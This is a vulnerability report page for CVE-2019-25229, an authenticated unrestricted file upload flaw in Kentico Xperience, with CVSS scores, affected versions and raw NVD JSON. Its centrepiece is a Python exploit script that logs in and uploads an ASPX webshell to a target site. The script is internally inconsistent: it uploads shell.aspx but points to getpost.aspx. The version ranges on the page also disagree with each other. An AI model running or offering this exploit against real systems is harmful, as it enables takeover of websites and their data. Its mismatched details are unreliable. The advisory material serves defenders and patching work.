Security Vulnerability Report
中文
CVE-2019-25229 CVSS 8.8 HIGH

CVE-2019-25229

Published: 2025-12-18 20:15:49
Last Modified: 2025-12-24 18:16:55
Source: [email protected]

Description

An unrestricted file upload vulnerability in Kentico Xperience allows authenticated users with 'Read data' permissions to upload arbitrary file types via MVC form file uploader components. Attackers can manipulate file names and upload potentially malicious files to the system, enabling unauthorized file uploads.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:* - VULNERABLE
Kentico Xperience < 13.0.200
Kentico Xperience 12.0.x
Kentico Xperience 11.0.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2019-25229 PoC - Kentico Xperience Unrestricted File Upload # Requires valid account with 'Read data' permissions import requests import sys TARGET_URL = "https://target-site.com" LOGIN_URL = f"{TARGET_URL}/CMSPages/logon.aspx" UPLOAD_URL = f"{TARGET_URL}/CMSFormControls/FileUploader/upload.aspx" def login(session, username, password): """Authenticate to Kentico Xperience""" data = { "username": username, "password": password, "login": "Log in" } response = session.post(LOGIN_URL, data=data) return response.status_code == 200 def upload_webshell(session, webshell_path="shell.aspx"): """Upload malicious webshell file""" with open(webshell_path, 'rb') as f: files = { 'file': ('shell.aspx', f, 'application/x-aspx'), } data = { 'nodeId': '1', 'parentNodeId': '1', 'culture': 'en-US' } response = session.post(UPLOAD_URL, files=files, data=data) return response def main(): if len(sys.argv) < 4: print("Usage: python cve-2019-25229.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] username = sys.argv[2] password = sys.argv[3] session = requests.Session() if login(session, username, password): print("[+] Login successful") response = upload_webshell(session) if response.status_code == 200: print("[+] Webshell uploaded successfully") print(f"[+] Access shell at: {TARGET_URL}/getpost.aspx") else: print("[-] Upload failed") else: print("[-] Login failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2019-25229", "sourceIdentifier": "[email protected]", "published": "2025-12-18T20:15:48.883", "lastModified": "2025-12-24T18:16:55.480", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An unrestricted file upload vulnerability in Kentico Xperience allows authenticated users with 'Read data' permissions to upload arbitrary file types via MVC form file uploader components. Attackers can manipulate file names and upload potentially malicious files to the system, enabling unauthorized file uploads."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-434"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kentico:xperience:*:*:*:*:*:*:*:*", "versionEndIncluding": "12.0.29", "matchCriteriaId": "D14644C9-876C-4A30-99DD-C55F5CEBF132"}]}]}], "references": [{"url": "https://devnet.kentico.com/download/hotfixes", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/kentico-xperience-mvc-forms-unrestricted-file-upload", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.